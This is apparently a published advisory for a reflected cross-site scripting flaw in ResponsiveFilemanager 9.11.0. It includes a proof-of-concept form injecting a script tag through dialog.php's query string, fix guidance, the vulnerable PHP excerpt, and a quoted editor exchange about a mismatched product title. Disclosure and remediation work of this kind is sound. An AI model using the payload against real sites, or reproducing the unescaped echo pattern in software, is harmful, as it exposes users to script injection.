Responsive File Manager 9.11.0 Cross Site Scripting
Posted on 12 January 2017
*=============================================================|
| Exploit Title: ResponsiveFilemanager Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.responsivefilemanager.com/
|
| Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
|
| Version : v9.11.0
|
| Tested on: Kali Linux
|
| Date: 1 /10 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|    <TITLE>ResponsiveFilemanager Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get">
| <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
|</form>
|</BODY>
|</HTML>
|
| Note: the sink is the query string of a GET request to filemanager/dialog.php. dialog.php builds the `value` attribute of the hidden `current_url` input from `$_SERVER['REQUEST_URI']` without HTML-encoding it (see the vulnerable code below), so the `"` in the payload terminates the attribute and the `<script>` element that follows is rendered by the victim's browser. The form above does not deliver the payload on its own: a hidden input with only an `id` and no `name` is not submitted, so the string in its `value` has to be appended directly as the query string of the dialog.php URL. Clients that percent-encode `"`, `<` and `>` in the query (browsers following the WHATWG URL query encode set) send `%22`/`%3C`/`%3E`, which `REQUEST_URI` reflects unchanged and harmlessly; reproduce with a client that sends the characters raw (curl, or an intercepting proxy).
*=======================|
|How to fix this vulnerability :
|
|HTML-encode every value at the point where it is echoed into an attribute: in dialog.php change each `<?php echo $var;?>` below to `<?php echo htmlspecialchars($var, ENT_QUOTES, 'UTF-8');?>` (for the `current_url` line wrap the whole `str_replace(...)` result). Filtering "input variables" is not sufficient on its own — the reflected value is `$_SERVER['REQUEST_URI']`, which is not a parameter the application reads explicitly but is fully attacker-controlled, and the `str_replace()` on that line only strips known parameters and is not an encoding step. Several of the other raw `echo` calls in the same block (`popup`, `editor`, `crossdomain`, `field_id`, `type_param`) correspond to GET parameters that appear in the PoC query string; whether they are assigned from `$_GET` without validation is not visible in this excerpt, so they should be checked and encoded the same way.
|
*=======================|
|Vulnerable code :
|
|<body>
|    <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" />
|    <input type="hidden" id="popup" value="<?php echo $popup;?>" />
|    <input type="hidden" id="callback" value="<?php echo $callback; ?>" />
|    <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" />
|    <input type="hidden" id="editor" value="<?php echo $editor;?>" />
|    <input type="hidden" id="view" value="<?php echo $view;?>" />
|    <input type="hidden" id="subdir" value="<?php echo $subdir;?>" />
|    <input type="hidden" id="field_id" value="<?php echo $field_id;?>" />
|    <input type="hidden" id="type_param" value="<?php echo $type_param;?>" />
|    <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" />
|    <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" />
|    <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" />
|    <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" />
|    <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" />
|    <input type="hidden" id="ok" value="<?php echo trans('OK');?>" />
|    <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" />
|    <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" />
|    <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" />
|    <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="base_url" value="<?php echo $base_url?>"/>
|    <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/>
|    <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/>
|    <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/>
|    <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/>
|    <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/>
|    <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" />
|    <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" />
|    <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" />
|    <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" />
|    <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" />
|    <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" />
|    <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" />
|    <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" />
|    <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" />
|    <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" />
|    <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" />
|    <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" />
|    <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" />
|    <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" />
|    <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" />
|    <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" />
|    <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" />
|    <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" />
|    <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" />
|    <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" />
|    <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" />
|    <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" />
|    <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" />
|    <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" />
|    <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" />
|    <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" />
|    <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" />
|    <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" />
|    <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" />
|    <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" />
|    <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" />
|    <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" />
|    <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" />
|    <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" />
|    <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" />
|
| (The `'&******='.$******` token in the `current_url` line is a word masked in the published text, not code from the project; the original author's deliberate `f.ilter` spelling in the fix section suggests the masked word is `filter`, i.e. `'&filter='.$filter`. Verify against the 9.11.0 dialog.php before relying on it.)
*=============================================================|
| Special Thanks To : Ehsan Cod3r, micle, Und3rgr0und, Amir.ght,
| xenotix, modiret, V For Vendetta, Alireza, r4ouf, Spoofer,
| And All Of My Friends. The Last One : My Self, M.R.S.L.Y
*=============================================================|

From: Packet Storm <packet@packetstormsecurity.com>
To: aaNc Kha! aa <nc_521@yahoo.com>
Sent: Wednesday, 11 January 2017, 6:40:19
Subject: Re: ResponsiveFilemanager Cross Site Scripting

Why does one part say Benson Bank CMS and another ResponsiveFileManager?

On Tue, Jan 10, 2017 at 02:52:42PM +0000, aaNc Kha! aa wrote:
> *=============================================================|
> | Exploit Title: ResponsiveFilemanager Cross Site Scripting
> |
> | Exploit Author: Ashiyane Digital Security Team
> |
> | Vendor Homepage: http://www.responsivefilemanager.com/
> |
> | Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
> |
> | Version : v9.11.0
> |
> | Tested on: Kali Linux
> |
> | Date: 1 /10 / 2017
> *=============================================================|
> | Exploit Code:
> |
> |<HTML>
> |<HEAD>
> |    <TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE>
> |</HEAD>
> |<BODY>
> |<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get">
> | <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
> |</form>
> |</BODY>
> |</HTML>
> *=======================|
> |How to fix this 
vulnerability :
> |
> |You should first try to filter all input variables – after, use command echo in script :)
> |
> *=======================|
> |Vulnerable code :
> |
> |<body>
> |    <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" />
> |    <input type="hidden" id="popup" value="<?php echo $popup;?>" />
> |    <input type="hidden" id="callback" value="<?php echo $callback; ?>" />
> |    <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" />
> |    <input type="hidden" id="editor" value="<?php echo $editor;?>" />
> |    <input type="hidden" id="view" value="<?php echo $view;?>" />
> |    <input type="hidden" id="subdir" value="<?php echo $subdir;?>" />
> |    <input type="hidden" id="field_id" value="<?php echo $field_id;?>" />
> |    <input type="hidden" id="type_param" value="<?php echo $type_param;?>" />
> |    <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" />
> |    <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" />
> |    <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" />
> |    <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" />
> |    <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" />
> |    <input type="hidden" id="ok" value="<?php echo trans('OK');?>" />
> |    <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" />
> |    <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" />
> |    <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" />
> |    <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="base_url" value="<?php echo $base_url?>"/>
> |    <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/>
> |    <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/>
> |    <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/>
> |    <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/>
> |    <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/>
> |    <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" />
> |    <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" />
> |    <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" />
> |    <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" />
> |    <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" />
> |    <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" />
> |    <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" />
> |    <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" />
> |    <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" />
> |    <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" />
> |    <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" />
> |    <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" />
> |    <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" />
> |    <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" />
> |    <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" />
> |    <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" />
> |    <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" />
> |    <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" />
> |    <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" />
> |    <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" />
> |    <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" />
> |    <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" />
> |    <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" />
> |    <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" />
> |    <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" />
> |    <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" />
> |    <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" />
> |    <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" />
> |    <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" />
> |    <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" />
> |    <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" />
> |    <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" />
> |    <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" />
> |    <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" />
> |
> *=============================================================|
> | Special Thanks To : Ehsan Cod3r, micle, Und3rgr0und, Amir.ght,
> | xenotix, modiret, V For Vendetta, Alireza, r4ouf, Spoofer,
> | And All Of My Friends. The Last One : My Self, M.R.S.L.Y
> *=============================================================|